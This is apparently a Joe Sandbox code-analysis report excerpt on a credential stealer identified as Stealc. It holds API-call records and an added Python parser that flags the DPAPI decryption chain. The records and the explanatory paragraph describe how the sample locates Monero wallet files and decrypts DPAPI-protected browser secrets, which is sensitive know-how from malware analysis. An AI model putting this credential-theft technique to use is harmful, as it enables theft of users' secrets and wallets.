                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %RF$(EG$h ~$mjw}$tp-|$x#P$rv[
                                        • API String ID: 0-3554432174
                                        • Opcode ID: 4049dfb48f89d3aab76bb7df0f03e2a425fd62d49f5f057ab6d35e55a35c5f34
                                        • Instruction ID: 9490363c7ce7b4e24505a5fcac167f4f5c1a6f56aef6cb1eb167a8d19cef6199
                                        • Opcode Fuzzy Hash: 4049dfb48f89d3aab76bb7df0f03e2a425fd62d49f5f057ab6d35e55a35c5f34
                                        • Instruction Fuzzy Hash: 56B2C1B360C604AFE3046F29EC8567AFBE9EF94720F16492DE6C5C3744E63598408B97
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E30D79), ref: 00E1E5A2
                                        • StrCmpCA.SHLWAPI(?,00E315F0), ref: 00E1E5F2
                                        • StrCmpCA.SHLWAPI(?,00E315F4), ref: 00E1E608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1ECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 0d7e40bf4a4b4eb046a83691bf7d3da91fcfbe0755735af28e071f07f521ef41
                                        • Instruction ID: 6b37db10d4bf60472e05af5c2981a1f73e396f8bc4eec7243fecc976b42b4243
                                        • Opcode Fuzzy Hash: 0d7e40bf4a4b4eb046a83691bf7d3da91fcfbe0755735af28e071f07f521ef41
                                        • Instruction Fuzzy Hash: 7012F172A101289BCB14FB60EDA7EED73B9AF54300F4855F9B50A76191EE306F48CB52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &l@$&l@$3w'$5u?o$M=$_V
                                        • API String ID: 0-2860400531
                                        • Opcode ID: 29fb3af7ac6306df4e47f2df84edd90effa67454228a0fbde3f7128c4facd0e9
                                        • Instruction ID: 620f636ebce1dce15cd06ed7e75959c03a4cc73c6da05a4c6677d8daa187ac79
                                        • Opcode Fuzzy Hash: 29fb3af7ac6306df4e47f2df84edd90effa67454228a0fbde3f7128c4facd0e9
                                        • Instruction Fuzzy Hash: A5B208F3A0C2049FE704AE2DEC4567ABBE9EFD4720F1A453DEAC4C3744EA3558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /y~>$VG~+$Z$~$i}u@$kww$nG
                                        • API String ID: 0-4078536043
                                        • Opcode ID: b9381d1525e2395afe05c4b2d3a821d15bd2685c799ddd8c5d3d997e2fdf6952
                                        • Instruction ID: ca3fc6dae69e67c7a9e1a3dfe27c37d100d70006288d1063e796e2dbb4590d40
                                        • Opcode Fuzzy Hash: b9381d1525e2395afe05c4b2d3a821d15bd2685c799ddd8c5d3d997e2fdf6952
                                        • Instruction Fuzzy Hash: A3B2F5F3A0C204AFE3146E2DEC8567AFBE9EBD4720F164A3DE6C4C3744E63558058692
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
                                        • LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: >O
                                        • API String ID: 4291131564-1870091082
                                        • Opcode ID: 72daca3b4fc441d552e6a0e1652195e170c3ea3af9a80ac0dbf322742135a627
                                        • Instruction ID: aca274c12e14cb7ba7c703d3c3ef8a996e0cf531680423397e9bc71e001736d5
                                        • Opcode Fuzzy Hash: 72daca3b4fc441d552e6a0e1652195e170c3ea3af9a80ac0dbf322742135a627
                                        • Instruction Fuzzy Hash: 2811A474641308AFEB11CF64C895FAA77B5EB89B14F208458FD159F390C7B6A941CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: EZgG$Kw:W$T5$Vf{$W{y
                                        • API String ID: 0-3200713465
                                        • Opcode ID: 0c11e4ac17bedf741a1202863e813483fc19936719768f9c955134cd01553c31
                                        • Instruction ID: d4b0ad528ca46801fb4581e60ecb19a6644d559e3e78bb7464f4dd0d690b6f07
                                        • Opcode Fuzzy Hash: 0c11e4ac17bedf741a1202863e813483fc19936719768f9c955134cd01553c31
                                        • Instruction Fuzzy Hash: 9BB227F3A08210AFE704AE2DEC8567ABBE9EFD4720F1A453DE6C4C7744E63158458693
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: 528c8c927a71e2d0a0fa49f87b71ca9e423c297378a9f504e57d622b3ebd2f91
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: 73418212D19BD5C5CB058B7444A02EEBFB22FD6210F6D82DAC4DD1F782C774414AD3A5
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C97C
                                        • lstrcat.KERNEL32(?,00E30B47), ref: 00E1CA43
                                        • lstrcat.KERNEL32(?,00E30B4B), ref: 00E1CA57
                                        • lstrcat.KERNEL32(?,00E30B4E), ref: 00E1CA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00E26C0C
                                        • sscanf.NTDLL ref: 00E26C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E26C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E26C60
                                        • ExitProcess.KERNEL32 ref: 00E26C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E172AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E172B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E172E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E17304
                                        • LocalFree.KERNEL32(?), ref: 00E1730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E297AE
                                        • Process32First.KERNEL32(00E30ACE,00000128), ref: 00E297C2
                                        • Process32Next.KERNEL32(00E30ACE,00000128), ref: 00E297D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00E297EC
                                        • CloseHandle.KERNEL32(00E30ACE), ref: 00E2980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00E151D4,40000001,00000000,00000000,?,00E151D4), ref: 00E29050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01A8EC80,00000000,?,00E30DF8,00000000,?,00000000,00000000), ref: 00E27BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01A8EC80,00000000,?,00E30DF8,00000000,?,00000000,00000000,?), ref: 00E27C0D
                                        • wsprintfA.USER32 ref: 00E27C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        APIs
                                        • CoCreateInstance.COMBASE(00E2E120,00000000,00000001,00E2E110,00000000), ref: 00E239A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E23A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
                                        • LocalFree.KERNEL32(?), ref: 00E1A323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: ed866d46a58c32a593db6396566c28ab6eb6ab74ddce51d0024da51f3833f5b2
                                        • Instruction ID: 9897a69a8a8f5dd3b59fe3506ed82dd68383fcf7cde849f85ce5e3590f0fa275
                                        • Opcode Fuzzy Hash: ed866d46a58c32a593db6396566c28ab6eb6ab74ddce51d0024da51f3833f5b2
                                        • Instruction Fuzzy Hash: 2B11E8B4A00209DFCB04DFA8D985AAEB7B5FB88700F108569ED15AB354D774AE50CBA1
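The record above is the one in this stretch of the report that resolves to named imports, and it is the capability behind the Stealc verdict: CryptUnprotectData is the DPAPI decryption call, the recovered arguments (?,0,0,0,0,0,?) leave pOptionalEntropy NULL and dwFlags 0, so the blob can be decrypted by any code running as the same user, and the LocalAlloc/LocalFree pair around it handles the output buffer that CryptUnprotectData returns (which must be released with LocalFree). That is consistent with decrypting DPAPI-protected browser secrets in the logged-on user's context. The parser below is an added example, not Joe Sandbox's or the sample's own code: it reads records in the layout shown on this page (assumed: a record starts at an 'APIs' or 'Strings' header and ends at its 'Instruction Fuzzy Hash' line), keeps each API call with its module and call-site address, checks that the 'API String ID' pair agrees with the 'API ID' / 'String ID' fields, and flags the DPAPI chain. The sample input is a constructed excerpt of two records copied from this page with the 'Associated:' lines left out; reading the fourth dotted field of the .sdmp name as the region start address is an assumption.

```python
"""Parse per-function records of the Joe Sandbox code analysis above and flag
the DPAPI decryption chain. Added example; not Joe Sandbox's or the sample's code.
Assumed layout (as seen on this page): a record starts at an 'APIs' or 'Strings'
header and ends at its 'Instruction Fuzzy Hash' line."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: two records copied from this report in its own layout
# (the CryptUnprotectData routine and the 'xn--' string routine); the IDA
# plugin and 'Associated:' lines are omitted for brevity.
SAMPLE = """\
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
• LocalFree.KERNEL32(?), ref: 00E1A323
Memory Dump Source
• Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
• Instruction ID: 9897a69a8a8f5dd3b59fe3506ed82dd68383fcf7cde849f85ce5e3590f0fa275
• Opcode Fuzzy Hash: ed866d46a58c32a593db6396566c28ab6eb6ab74ddce51d0024da51f3833f5b2
• Instruction Fuzzy Hash: 2B11E8B4A00209DFCB04DFA8D985AAEB7B5FB88700F108569ED15AB354D774AE50CBA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID: xn--
• API String ID: 0-2826155999
• Instruction ID: 309257308875b171eda0e5f90f139482ab6db9d10abd086417f0b14587dd48f3
• Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
• Instruction Fuzzy Hash: 24A247B1D602688AEF28CF68E8503FDBBB1FF45384F1852AAD4567B281D7355E81CB50
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^• ([A-Za-z ]+): ?(.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int  # call-site address inside the dumped image


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> list[FunctionRecord]:
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):  # a new function record begins here
            cur = FunctionRecord()
            records.append(cur)
        elif cur is not None:
            if m := API_RE.match(line):
                cur.apis.append(ApiCall(m[1], m[2], m[3].split(","), int(m[4], 16)))
            elif m := FIELD_RE.match(line):
                cur.fields[m[1]] = m[2]
    return records


def ids_consistent(rec: FunctionRecord) -> bool:
    """'API String ID' is '<api hash>-<string hash>'; a 0 hash pairs with an empty ID."""
    api_hash, str_hash = rec.fields.get("API String ID", "0-0").split("-")
    return ((api_hash == "0") == (rec.fields.get("API ID", "") == "")
            and (str_hash == "0") == (rec.fields.get("String ID", "") == ""))


def dump_region(rec: FunctionRecord) -> tuple[int, int]:
    """(region start, image base). Assumption: the 4th dotted field of the .sdmp
    name is the region start and 'Offset' is the image base."""
    name, rest = rec.fields["Source File"].split(", Offset: ")
    return int(name.split(".")[3], 16), int(rest.split(",")[0], 16)


def dpapi_findings(rec: FunctionRecord) -> list[str]:
    """Flag the CryptUnprotectData chain a stealer uses to decrypt DPAPI-protected
    browser secrets in the logged-on user's context."""
    names = {a.name for a in rec.apis}
    findings = []
    if "CryptUnprotectData" in names:
        findings.append("dpapi-unprotect")
        # CryptUnprotectData(pDataIn, ppszDataDescr, pOptionalEntropy, pvReserved,
        #                    pPromptStruct, dwFlags, pDataOut): index 2 is the entropy.
        call = next(a for a in rec.apis if a.name == "CryptUnprotectData")
        if len(call.args) == 7 and call.args[2] == "00000000":
            findings.append("no-optional-entropy")  # any process in the session can decrypt
        if {"LocalAlloc", "LocalFree"} <= names:
            findings.append("copies-and-frees-blob")  # pDataOut must be freed with LocalFree
    return findings


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        calls = [f"{a.module}!{a.name}@{a.ref:08X}" for a in rec.apis]
        print(rec.fields.get("API ID") or rec.fields.get("String ID"), calls,
              "ids_ok" if ids_consistent(rec) else "ids_BAD", dpapi_findings(rec))
```

Run it on the saved report text instead of SAMPLE to list every routine that touches CryptUnprotectData; the call-site addresses (ref) are relative to the dumped image at the 'Offset' base, so they can be fed straight to the IDA snapshot named in the record.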
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
